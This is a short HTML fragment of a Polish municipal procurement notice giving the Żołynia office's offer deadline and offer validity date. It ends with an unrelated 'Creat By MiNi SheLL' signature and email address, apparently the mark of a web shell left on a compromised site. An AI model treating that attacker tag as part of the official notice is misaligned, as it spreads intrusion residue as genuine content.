<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2009 godzina 10:00, miejsce: urząd Gminy w Żołyni ,37-110 Żołynia ul. Rynek 22 , pok. 102.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 04.04.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com